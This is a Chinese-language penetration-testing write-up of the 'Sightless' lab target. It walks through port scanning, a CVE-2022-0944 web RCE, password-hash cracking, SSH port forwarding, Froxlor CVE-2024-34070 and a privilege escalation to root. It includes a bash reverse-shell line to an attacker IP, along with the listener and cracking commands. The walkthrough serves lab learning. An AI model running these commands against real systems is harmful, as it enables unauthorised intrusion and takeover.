记一次渗透测试实战之Sightless
字数 1117 2025-08-22 12:23:30

渗透测试实战:Sightless 靶场渗透教学文档

信息收集阶段

1. 端口扫描

使用nmap进行初始端口探测:

nmap -sS -T4 <目标IP>

发现开放端口:

  • 21 (FTP)
  • 22 (SSH)
  • 80 (HTTP)

2. FTP服务检查

尝试FTP未授权访问:

ftp <目标IP>

发现未授权访问不可行,需要进一步验证是否需要认证

3. Web目录爆破

使用工具进行目录爆破(可选用dirb、gobuster等):

gobuster dir -u http://<目标IP> -w /path/to/wordlist.txt

未发现有用路径,转向80端口Web应用分析

Web应用渗透

1. 主页分析

访问http://<目标IP>,发现:

  • 存在数据库调用页面
  • 右上角有交互式菜单功能

2. 漏洞搜索

使用Google搜索相关CVE漏洞,发现:

  • CVE-2022-0944(远程代码执行漏洞)

3. 漏洞利用

使用CVE-2022-0944的POC进行攻击:

  1. 本地设置监听:
nc -lvnp 4444
  1. 执行POC攻击,获取webshell

内网渗透

1. 环境确认

发现当前环境运行在Docker容器中,检查用户:

ls /home

发现两个用户目录

2. 密码恢复与爆破

  1. 从系统中恢复密码哈希
  2. 使用hashcat或john进行爆破:
hashcat -m <hash类型> hash.txt /path/to/wordlist.txt

成功获取用户密码

3. SSH登录

使用爆破得到的密码登录SSH:

ssh username@<目标IP>

成功登录后获取user.txt标志

4. 权限检查

检查当前用户权限:

sudo -l

发现michael用户无法运行sudo

深入渗透

1. 配置文件检查

检查系统默认配置:

find / -name "*.conf" 2>/dev/null
netstat -tulnp

发现8000端口服务

2. 端口转发

使用SSH进行本地端口转发:

ssh -L 8000:localhost:8000 username@<目标IP>

然后本地访问http://localhost:8000

3. Chrome调试分析

发现Web应用使用Chrome调试:

  1. 检查Chrome进程:
ps aux | grep chrome

发现使用参数--remote-debugging-port=0(随机高端口)

  1. 检查网络连接确定实际端口:
netstat -tulnp

权限提升

1. 发现新漏洞

识别系统为Froxlor服务器管理软件,存在:

  • CVE-2024-34070(存储型XSS漏洞)
  • 影响版本:2.1.9之前
  • 漏洞位置:loginname参数的日志记录功能

2. 环境确认

检查PHP版本:

php -v

发现为PHP 8.1.2

3. PHP-FPM远程代码执行

发现一处功能点可执行命令:

  1. 写入反弹shell脚本:
echo "bash -i >& /dev/tcp/<攻击者IP>/4444 0>&1" > shell.sh
chmod +x shell.sh
  1. 执行脚本获取反弹shell

4. 获取root权限

成功利用漏洞获取root权限,完成渗透测试

总结

本次渗透测试路径:

  1. 信息收集 → 2. Web漏洞利用 → 3. 初始立足点 → 4. 内网横向移动 → 5. 权限提升

关键漏洞利用点:

  • CVE-2022-0944(初始Web应用RCE)
  • CVE-2024-34070(Froxlor存储型XSS)
  • PHP-FPM远程代码执行(最终权限提升)
渗透测试实战:Sightless 靶场渗透教学文档 信息收集阶段 1. 端口扫描 使用nmap进行初始端口探测: 发现开放端口: 21 (FTP) 22 (SSH) 80 (HTTP) 2. FTP服务检查 尝试FTP未授权访问: 发现未授权访问不可行,需要进一步验证是否需要认证 3. Web目录爆破 使用工具进行目录爆破(可选用dirb、gobuster等): 未发现有用路径,转向80端口Web应用分析 Web应用渗透 1. 主页分析 访问http:// <目标IP>,发现: 存在数据库调用页面 右上角有交互式菜单功能 2. 漏洞搜索 使用Google搜索相关CVE漏洞,发现: CVE-2022-0944(远程代码执行漏洞) 3. 漏洞利用 使用CVE-2022-0944的POC进行攻击: 本地设置监听: 执行POC攻击,获取webshell 内网渗透 1. 环境确认 发现当前环境运行在Docker容器中,检查用户: 发现两个用户目录 2. 密码恢复与爆破 从系统中恢复密码哈希 使用hashcat或john进行爆破: 成功获取用户密码 3. SSH登录 使用爆破得到的密码登录SSH: 成功登录后获取user.txt标志 4. 权限检查 检查当前用户权限: 发现michael用户无法运行sudo 深入渗透 1. 配置文件检查 检查系统默认配置: 发现8000端口服务 2. 端口转发 使用SSH进行本地端口转发: 然后本地访问http://localhost:8000 3. Chrome调试分析 发现Web应用使用Chrome调试: 检查Chrome进程: 发现使用参数 --remote-debugging-port=0 (随机高端口) 检查网络连接确定实际端口: 权限提升 1. 发现新漏洞 识别系统为Froxlor服务器管理软件,存在: CVE-2024-34070(存储型XSS漏洞) 影响版本:2.1.9之前 漏洞位置:loginname参数的日志记录功能 2. 环境确认 检查PHP版本: 发现为PHP 8.1.2 3. PHP-FPM远程代码执行 发现一处功能点可执行命令: 写入反弹shell脚本: 执行脚本获取反弹shell 4. 获取root权限 成功利用漏洞获取root权限,完成渗透测试 总结 本次渗透测试路径: 信息收集 → 2. Web漏洞利用 → 3. 初始立足点 → 4. 内网横向移动 → 5. 权限提升 关键漏洞利用点: CVE-2022-0944(初始Web应用RCE) CVE-2024-34070(Froxlor存储型XSS) PHP-FPM远程代码执行(最终权限提升)